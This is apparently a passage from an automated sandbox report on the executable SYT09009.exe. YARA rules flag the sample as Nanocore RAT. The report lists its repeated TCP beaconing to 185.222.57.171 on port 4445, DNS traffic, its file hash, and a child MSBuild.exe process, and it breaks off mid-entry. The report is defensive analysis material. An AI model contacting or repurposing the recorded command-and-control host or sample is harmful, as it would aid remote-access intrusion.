May 11, 2021 19:42:24.422861099 CEST	49678	443	192.168.2.5	20.190.160.3
May 11, 2021 19:42:26.611650944 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:26.658994913 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:26.659238100 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:26.659939051 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:26.719755888 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:26.723910093 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:26.792601109 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:26.792767048 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:26.841800928 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:26.841959953 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:26.916867018 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:26.917015076 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:26.980290890 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:26.984802961 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.057868958 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.057929039 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.090778112 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.105550051 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.105649948 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.152225018 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.152347088 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.229600906 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.229736090 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.278985023 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.282124996 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.328902960 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.377808094 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.438328981 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.512018919 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.512145996 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.588552952 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.641199112 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.713516951 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.720041037 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.791659117 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.844398022 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.916591883 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:27.922945976 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:27.994776964 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:28.032567978 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:28.104135036 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:28.188642979 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:28.245826960 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:28.266870022 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:28.338500023 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:28.392080069 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:28.464000940 CEST	4445	49756	185.222.57.171	192.168.2.5
May 11, 2021 19:42:28.470048904 CEST	49756	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:32.486721992 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:32.533991098 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:32.534766912 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:32.535583019 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:32.592191935 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:32.593575954 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:32.668348074 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:32.668445110 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:32.715176105 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:32.718518019 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:32.776005983 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:32.782407999 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:32.854116917 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:32.860815048 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:32.886802912 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:32.907435894 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:32.907593966 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:32.979247093 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:32.979391098 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:33.026372910 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:33.026572943 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:33.073071957 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:33.110707998 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:33.182280064 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:33.182430983 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:33.246876955 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:33.282747030 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:33.354121923 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:33.517225981 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:33.588485003 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:33.588695049 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:33.652070045 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:33.674146891 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:33.744874954 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:33.782952070 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:33.854201078 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:33.938858986 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:34.010576963 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:34.016743898 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:34.088577032 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:34.142221928 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:34.213633060 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:34.642025948 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:34.713598013 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:34.720313072 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:34.791766882 CEST	4445	49759	185.222.57.171	192.168.2.5
May 11, 2021 19:42:34.844944000 CEST	49759	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:38.862752914 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:38.909380913 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:38.909519911 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:38.910159111 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:38.968122959 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:38.968698025 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.015947104 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.016170979 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.088581085 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.088752985 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.172538996 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.174809933 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.244807959 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.245289087 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.293472052 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.294646025 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.341278076 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.343143940 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.390052080 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.390247107 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.437082052 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.438858986 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.510476112 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.533238888 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.604142904 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.626693010 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.697882891 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.783003092 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.854187012 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.861186028 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:39.947936058 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:39.986160040 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:40.057707071 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:40.111093044 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:40.182162046 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:40.182272911 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:40.260399103 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:40.283183098 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:40.354172945 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:40.439141989 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:40.510456085 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:40.510598898 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:40.588624001 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:40.658943892 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:40.721277952 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:40.729185104 CEST	4445	49760	185.222.57.171	192.168.2.5
May 11, 2021 19:42:40.729377985 CEST	49760	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:44.738884926 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:44.785713911 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:44.785919905 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:44.786453009 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:44.843256950 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:44.843641043 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:44.890991926 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:44.894022942 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:44.963458061 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:44.963706017 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.026084900 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.026316881 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.058468103 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.073014021 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.073353052 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.121201992 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.121751070 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.168730974 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.168931007 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.215892076 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.221157074 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.291681051 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.346108913 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.416728020 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.471142054 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.541641951 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.541857004 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.619785070 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.689680099 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.760397911 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.768341064 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.838531971 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.892925024 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:45.963542938 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:45.971487999 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:46.041662931 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:46.096662045 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:46.166660070 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:46.237023115 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:46.308304071 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:46.308484077 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:46.369765043 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:46.455358028 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:46.526140928 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:46.533412933 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:46.604176044 CEST	4445	49761	185.222.57.171	192.168.2.5
May 11, 2021 19:42:46.689966917 CEST	49761	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:47.173733950 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:42:50.706423044 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:50.753055096 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:50.753164053 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:50.753968954 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:50.811038017 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:50.811141968 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:50.885447979 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:50.885613918 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:50.932585955 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:50.935815096 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.010386944 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.010567904 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.088624954 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.105442047 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.106437922 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.153038979 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.154730082 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.201653957 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.201909065 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.248708010 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.248809099 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.307460070 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.346524000 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.416712046 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.487262964 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.557307959 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.557441950 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.619913101 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.856172085 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.916841984 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.916919947 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:51.979206085 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:51.979372978 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:52.057291031 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:52.096591949 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:52.166763067 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:52.241652012 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:52.307303905 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:52.362368107 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:52.432387114 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:52.432531118 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:52.510459900 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:52.533849001 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:52.604171038 CEST	4445	49762	185.222.57.171	192.168.2.5
May 11, 2021 19:42:53.080960035 CEST	49762	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.101380110 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.150727034 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.150850058 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.151446104 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.209055901 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.209356070 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.256253958 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.256355047 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.322954893 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.323044062 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.401026011 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.401106119 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.479106903 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.488768101 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.496068954 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.537216902 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.537321091 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.604207993 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.604424953 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.651318073 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.705878019 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:42:57.754580975 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:42:57.799684048 CEST	49763	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:43:02.213721991 CEST	4445	49763	185.222.57.171	192.168.2.5
May 11, 2021 19:43:02.268690109 CEST	49763	4445	192.168.2.5	185.222.57.171

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 11, 2021 19:40:41.097431898 CEST	61733	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:41.148153067 CEST	53	61733	8.8.8.8	192.168.2.5
May 11, 2021 19:40:41.909591913 CEST	65447	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:41.959249020 CEST	53	65447	8.8.8.8	192.168.2.5
May 11, 2021 19:40:42.046721935 CEST	52441	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:42.105967999 CEST	53	52441	8.8.8.8	192.168.2.5
May 11, 2021 19:40:42.728183985 CEST	62176	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:42.785489082 CEST	53	62176	8.8.8.8	192.168.2.5
May 11, 2021 19:40:43.706080914 CEST	59596	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:43.754923105 CEST	53	59596	8.8.8.8	192.168.2.5
May 11, 2021 19:40:44.184880018 CEST	65296	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:44.247273922 CEST	53	65296	8.8.8.8	192.168.2.5
May 11, 2021 19:40:44.533559084 CEST	63183	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:44.582956076 CEST	53	63183	8.8.8.8	192.168.2.5
May 11, 2021 19:40:46.383810997 CEST	60151	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:46.436259031 CEST	53	60151	8.8.8.8	192.168.2.5
May 11, 2021 19:40:47.325426102 CEST	56969	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:47.384027958 CEST	53	56969	8.8.8.8	192.168.2.5
May 11, 2021 19:40:48.260334969 CEST	55161	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:48.311880112 CEST	53	55161	8.8.8.8	192.168.2.5
May 11, 2021 19:40:49.094321012 CEST	54757	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:49.144437075 CEST	53	54757	8.8.8.8	192.168.2.5
May 11, 2021 19:40:52.681729078 CEST	49992	53	192.168.2.5	8.8.8.8
May 11, 2021 19:40:52.733273029 CEST	53	49992	8.8.8.8	192.168.2.5
May 11, 2021 19:41:05.331192970 CEST	60075	53	192.168.2.5	8.8.8.8
May 11, 2021 19:41:05.394089937 CEST	53	60075	8.8.8.8	192.168.2.5
May 11, 2021 19:41:17.269723892 CEST	55016	53	192.168.2.5	8.8.8.8
May 11, 2021 19:41:17.326965094 CEST	53	55016	8.8.8.8	192.168.2.5
May 11, 2021 19:41:30.598397017 CEST	64345	53	192.168.2.5	8.8.8.8
May 11, 2021 19:41:30.652195930 CEST	53	64345	8.8.8.8	192.168.2.5
May 11, 2021 19:41:35.789753914 CEST	57128	53	192.168.2.5	8.8.8.8
May 11, 2021 19:41:35.848423958 CEST	53	57128	8.8.8.8	192.168.2.5
May 11, 2021 19:41:36.148536921 CEST	54791	53	192.168.2.5	8.8.8.8
May 11, 2021 19:41:36.205853939 CEST	53	54791	8.8.8.8	192.168.2.5
May 11, 2021 19:41:47.910130024 CEST	50463	53	192.168.2.5	8.8.8.8
May 11, 2021 19:41:47.980202913 CEST	53	50463	8.8.8.8	192.168.2.5
May 11, 2021 19:41:49.166731119 CEST	50394	53	192.168.2.5	8.8.8.8
May 11, 2021 19:41:49.225449085 CEST	53	50394	8.8.8.8	192.168.2.5
May 11, 2021 19:42:08.874237061 CEST	58530	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:08.995861053 CEST	53	58530	8.8.8.8	192.168.2.5
May 11, 2021 19:42:09.546247005 CEST	53813	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:09.662774086 CEST	53	53813	8.8.8.8	192.168.2.5
May 11, 2021 19:42:10.244744062 CEST	63732	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:10.305036068 CEST	53	63732	8.8.8.8	192.168.2.5
May 11, 2021 19:42:10.795542955 CEST	57344	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:10.853147984 CEST	53	57344	8.8.8.8	192.168.2.5
May 11, 2021 19:42:11.439920902 CEST	54450	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:11.499397993 CEST	53	54450	8.8.8.8	192.168.2.5
May 11, 2021 19:42:12.111586094 CEST	59261	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:12.168761969 CEST	53	59261	8.8.8.8	192.168.2.5
May 11, 2021 19:42:12.610980988 CEST	57151	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:12.668272018 CEST	53	57151	8.8.8.8	192.168.2.5
May 11, 2021 19:42:13.481811047 CEST	59413	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:13.539010048 CEST	53	59413	8.8.8.8	192.168.2.5
May 11, 2021 19:42:14.948851109 CEST	60516	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:15.012072086 CEST	53	60516	8.8.8.8	192.168.2.5
May 11, 2021 19:42:15.515224934 CEST	51649	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:15.566854954 CEST	53	51649	8.8.8.8	192.168.2.5
May 11, 2021 19:42:27.988873005 CEST	65086	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:28.056380987 CEST	53	65086	8.8.8.8	192.168.2.5
May 11, 2021 19:42:29.749424934 CEST	56432	53	192.168.2.5	8.8.8.8
May 11, 2021 19:42:29.812186003 CEST	53	56432	8.8.8.8	192.168.2.5

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SYT09009.exe PID: 4956 Parent PID: 5720

General

Start time:	19:40:51
Start date:	11/05/2021
Path:	C:\Users\user\Desktop\SYT09009.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SYT09009.exe'
Imagebase:	0x400000
File size:	555010 bytes
MD5 hash:	FBFDDFC110FD9D3775674447316DE3D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: MSBuild.exe PID: 3332 Parent PID: 4956

General

Start time:	19:40:52
Start date:	11/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SYT09009.exe'
Imagebase:	0x4e0000
